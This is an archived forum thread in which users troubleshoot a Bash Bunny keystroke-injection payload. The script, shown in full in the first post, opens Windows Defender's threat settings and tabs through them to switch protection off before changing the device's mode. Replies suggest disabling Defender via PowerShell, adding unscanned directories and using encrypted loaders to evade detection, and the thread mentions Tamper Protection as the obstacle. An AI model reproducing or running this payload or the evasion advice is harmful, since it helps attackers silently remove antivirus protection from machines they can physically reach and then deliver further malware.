SamSepi46
Posted January 30, 2022

I'm trying to write a simple payload that involves manually disabling Windows Defender. I need the 1st part of the payload to use ATTACKMODE HID and the 2nd part to use ATTACKMODE HID STORAGE. However, the Bash Bunny never seems to show up as a flash drive for that second part of the payload. What am I doing wrong?

    #STAGE ONE
    LED B FAST
    ATTACKMODE HID
    Q GUI r
    Q DELAY 125
    Q STRING windowsdefender://threat/
    Q DELAY 125
    Q ENTER
    Q DELAY 1000
    Q TAB
    Q DELAY 1000
    Q TAB
    Q DELAY 1000
    Q TAB
    Q DELAY 1000
    Q TAB
    Q DELAY 1000
    Q ENTER
    Q DELAY 3000
    Q SPACE
    Q DELAY 3000
    Q ALT Y
    Q DELAY 50
    Q ALT F4
    Q DELAY 50
    #STAGE 2
    LED G FAST
    ATTACKMODE HID STORAGE

dark_pyrro
Posted January 31, 2022

Are you using a Bunny Mk1 or Mk2? Anyway, it really doesn't matter, I think it's related to firmware. There must be some issue with some parts of the Bunny features (perhaps in the ATTACKMODE script itself, I haven't looked further into it). When I run both my Mk1 and Mk2 on the latest firmware (1.7_332) the script (or variants of it) doesn't work. If I downgrade my Mk1 to the base firmware of the Mk1 (1.0_167) then the script works....

You could submit a support ticket for this to try to get it sorted.

NoExecute
Posted January 31, 2022

Just to be curious.. Why Storage? If you want to play with Defender, go through PowerShell and disable it / set up directories it doesn't scan, then load your payload from HID / Storage mode.

Depending on what you load, may I suggest encrypted loaders 🙂

Have fun ;)

/NX

SamSepi46 (Author)
Posted January 31, 2022

Thank you both.

dark_pyrro - I use the Mk1. I assumed it was a firmware issue, but on the off chance it was user error (totally possible) I wanted to make sure there wasn't anything I was missing. I used the responder payload a couple of weeks back and ever since then the switches never quite worked properly.

NoExecute - I tried to do it originally through PowerShell, but Windows "Tamper Protection" seems to block any change to the Windows firewall or Defender. Tamper Protection seems to be the only thing preventing me from disabling Defender with PowerShell. I'm interested in hearing more about encrypted loaders. I don't think I have ever messed with them before, but if it means I can disable Defender with PowerShell, sign me up.

Gwozd
Posted February 5, 2022

On 1/31/2022 at 3:13 PM, NoExecute said:

> Just to be curious.. Why Storage? If you want to play with Defender, go through PowerShell and disable it / set up directories it doesn't scan, then load your payload from HID / Storage mode.
>
> Depending on what you load, may I suggest encrypted loaders 🙂
>
> Have fun 😉
>
> /NX

I took your advice and it helped me.

Archived
This topic is now archived and is closed to further replies.